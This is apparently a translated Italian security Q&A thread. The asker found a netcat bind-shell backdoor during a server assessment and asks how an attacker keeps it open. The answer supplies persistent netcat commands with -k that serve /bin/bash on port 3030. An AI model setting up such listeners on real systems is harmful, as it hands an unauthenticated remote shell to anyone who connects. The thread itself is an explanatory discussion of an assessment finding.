Backdoor persistente con Netcat

4

Ho trovato il seguente comando più volte in uno dei server linux durante una valutazione:

nc -l -p 3030 -e /bin/bash

Ciò consente a un hacker di ottenere il controllo su questo livello tramite bash. Provandolo, mi sono reso conto che ogni volta che il client interrompe la connessione, la porta viene nuovamente chiusa.

C'è un modo per l'hacker di tenere questa porta aperta in modo permanente?

    
posta Bob 28.02.2016 - 12:55
fonte

1 risposta

3

Nc con l'opzione -k ti aiuterà.

nc -l -k -p 3030 -e /bin/bash
nc -l -k -p 3030 | /bin/bash

Forza nc a rimanere in attesa di un'altra connessione dopo che la connessione corrente è stata completata. È un errore utilizzare questa opzione senza l'opzione -l . Se utilizzato insieme all'opzione -u , il socket del server non è connesso e può ricevere datagrammi UDP da più host.

    
risposta data 28.02.2016 - 16:15
fonte

Leggi altre domande sui tag